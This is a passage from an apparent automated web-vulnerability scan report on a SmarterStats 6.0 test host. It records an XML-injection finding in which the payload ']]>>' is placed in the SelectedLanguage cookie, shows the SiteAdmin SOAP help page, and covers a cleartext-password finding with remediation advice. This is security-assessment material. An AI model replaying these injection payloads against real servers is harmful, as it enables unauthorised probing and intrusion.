at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=]]>>; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:19 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25952
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneID:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTPResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTPResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTPResult&gt;
&lt;/AddSiteWithFTPResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTPResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTPResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTPResult&gt;
&lt;/AddSiteWithFTPResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

4. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmEmailReportSettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Admin/frmEmailReportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:24 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8426



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Email Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmEmailReportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwODk4MzY1MDUPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWCGYPZBYCAgEPZBYCAgIPDxYCHwQFFnNvbWVvbmVAeW91cmRvbWFpbi5jb21kZAIBD2QWAgIBD2QWAgICDw8WAh8EBQkxMjcuMC4wLjFkZAIDD2QWAgIBD2QWAgICDw8WAh8EZWRkAgQPZBYCAgEPZBYEZg8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCAg8PFgIfBGVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUsY3RsMDAkTVBIJGNoa1NNVFBBdXRoZW50aWNhdGlvbl9TZXR0aW5nQ2hlY2tSGzOL99CxzdQfS16581et8/thZWIK141DJBgffZRGig==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnTest',''], [], 90, 'ctl00');
//]]>
</script>

       
